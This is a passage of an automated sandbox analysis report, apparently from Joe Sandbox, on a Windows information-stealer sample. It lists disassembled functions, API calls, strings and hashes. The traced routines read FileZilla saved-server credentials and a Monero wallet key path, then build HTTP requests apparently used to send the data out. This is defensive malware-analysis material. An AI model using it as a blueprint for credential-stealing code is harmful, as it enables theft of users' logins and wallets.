                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1da585e0b9489e89afd1ea01f1c741f3cc1db1805f298e129bb97b5d51efa512
                                  • Instruction ID: 5f7d5c8885282ee82d1860094da7d8f0a1fd8ff1f88cb61d134395fa862a7df3
                                  • Opcode Fuzzy Hash: 1da585e0b9489e89afd1ea01f1c741f3cc1db1805f298e129bb97b5d51efa512
                                  • Instruction Fuzzy Hash: 075125F3E086045FF3086A2AEC5577AB7D6EBD4710F1B843DDB8887748E93988064286
                                  Function 00D4F4BD Relevance: .2, Instructions: 166COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb34d34bc1ffdc57d5903cede6cf8f176aa32424f1479af48845b049779019c2
                                  • Instruction ID: dfdb17bb5dba5bd9290ed4e9e763cfe5eb25ad407e4549da1f9c69dd9b9a1b94
                                  • Opcode Fuzzy Hash: bb34d34bc1ffdc57d5903cede6cf8f176aa32424f1479af48845b049779019c2
                                  • Instruction Fuzzy Hash: 54418BF3B083045BF304697DDCC576AB6CADB94720F2A423DEB54D7784EC79A8064286
                                  Function 00E32C3E Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4edf23c824f94fc44316b2559adaa8a856e8f1f04c1f61349cb2ab73da261adb
                                  • Instruction ID: 955b095077fb9e48e345e21b385719e18224379d00b2a9ed8b46bff458baa91d
                                  • Opcode Fuzzy Hash: 4edf23c824f94fc44316b2559adaa8a856e8f1f04c1f61349cb2ab73da261adb
                                  • Instruction Fuzzy Hash: 3051D7F3A086009FE7146E29DCC576AFBE5EB94320F1B4A3DD6C483784EA7858058787
                                  Function 00A89750 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                  Function 00A80250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00A90DBA,00A90DB7,00A90DB6,00A90DB3), ref: 00A80362
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A80369
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00A80385
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80393
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00A803CF
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A803DD
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00A80419
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80427
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00A80463
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80475
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80502
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A8051A
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A80532
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A8054A
                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00A80562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00A80571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00A80580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A80593
                                  • lstrcat.KERNEL32(?,00A91678), ref: 00A805A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A805B5
                                  • lstrcat.KERNEL32(?,00A9167C), ref: 00A805C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 00A805D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A805E6
                                  • lstrcat.KERNEL32(?,00A91688), ref: 00A805F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00A80604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A80617
                                  • lstrcat.KERNEL32(?,00A91698), ref: 00A80626
                                  • lstrcat.KERNEL32(?,00A9169C), ref: 00A80635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A90DB2), ref: 00A8068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: e1bbe6df27f975989d9fb715d64b34e34c8829d2a9be4d26f0474d3df55ad1ec
                                  • Instruction ID: ef897b688c5cacba4758e5e8c072cf042b97fdde7e232a3b7dae89897df704ed
                                  • Opcode Fuzzy Hash: e1bbe6df27f975989d9fb715d64b34e34c8829d2a9be4d26f0474d3df55ad1ec
                                  • Instruction Fuzzy Hash: 55D1FE71E00108ABDB04FBF4DE96EEE7778BF64340F544519F102A6091EF79AA0ACB61
                                  Function 00A75960 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                    • Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A759F8
                                  • StrCmpCA.SHLWAPI(?,0068F400), ref: 00A75A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A75B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0068F4C0,00000000,?,0068E438,00000000,?,00A91A1C), ref: 00A75E71
                                  • lstrlen.KERNEL32(00000000), ref: 00A75E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00A75E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A75E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00A75EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00A75ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A75EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00A75F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A75F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00A75F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00A75FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00A75FBD
                                  • HttpOpenRequestA.WININET(00000000,0068F510,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A75BF8
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00A75FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------$8h
                                  • API String ID: 874700897-1913097653
                                  • Opcode ID: 4db567559b1b42450f0bee999ae928bf189efeec7cd6b9f71ab4885e21f3205e
                                  • Instruction ID: 81f297fea2e90b3a7a371dbbdf474dba269bf889a3ebffb5597e260ebca0b668
                                  • Opcode Fuzzy Hash: 4db567559b1b42450f0bee999ae928bf189efeec7cd6b9f71ab4885e21f3205e
                                  • Instruction Fuzzy Hash: 9A12F172920118AAEB15FBA0DD95FEEB378BF24700F50459AF10672091EF742E4ACF65
                                  Function 00A7CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A88B60: GetSystemTime.KERNEL32(00A90E1A,0068E2E8,00A905AE,?,?,00A713F9,?,0000001A,00A90E1A,00000000,?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A88B86
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A7CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A7D0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A7D0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D208
                                  • lstrcat.KERNEL32(?,00A91478), ref: 00A7D217
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D22A
                                  • lstrcat.KERNEL32(?,00A9147C), ref: 00A7D239
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D24C
                                  • lstrcat.KERNEL32(?,00A91480), ref: 00A7D25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D26E
                                  • lstrcat.KERNEL32(?,00A91484), ref: 00A7D27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D290
                                  • lstrcat.KERNEL32(?,00A91488), ref: 00A7D29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D2B2
                                  • lstrcat.KERNEL32(?,00A9148C), ref: 00A7D2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A7D2D4
                                  • lstrcat.KERNEL32(?,00A91490), ref: 00A7D2E3
                                    • Part of subcall function 00A8A820: lstrlen.KERNEL32(00A74F05,?,?,00A74F05,00A90DDE), ref: 00A8A82B
                                    • Part of subcall function 00A8A820: lstrcpy.KERNEL32(00A90DDE,00000000), ref: 00A8A885
                                  • lstrlen.KERNEL32(?), ref: 00A7D32A
                                  • lstrlen.KERNEL32(?), ref: 00A7D339
                                    • Part of subcall function 00A8AA70: StrCmpCA.SHLWAPI(00688AD8,00A7A7A7,?,00A7A7A7,00688AD8), ref: 00A8AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00A7D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: f36bddbdabcbb941b5dcdd500f1d23a030543e55458f98105544ecd3466d1aa8
                                  • Instruction ID: eb972e8a17b693629d472c6e8cb4961476d08b3da42be2fe012d442716241eff
                                  • Opcode Fuzzy Hash: f36bddbdabcbb941b5dcdd500f1d23a030543e55458f98105544ecd3466d1aa8
                                  • Instruction Fuzzy Hash: BCE10C71910108ABDB08FBA0DE96FEE7378BF64301F504559F147B6091DE39AA06CB72
                                  Function 00A74880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                    • Part of subcall function 00A747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A74915
                                  • StrCmpCA.SHLWAPI(?,0068F400), ref: 00A7493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A74ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A90DDB,00000000,?,?,00000000,?,",00000000,?,0068F450), ref: 00A74DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A74E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A74E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A74E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00A74EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00A74EC5
                                  • HttpOpenRequestA.WININET(00000000,0068F510,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A74B15
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00A74ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------$8h
                                  • API String ID: 460715078-1913097653
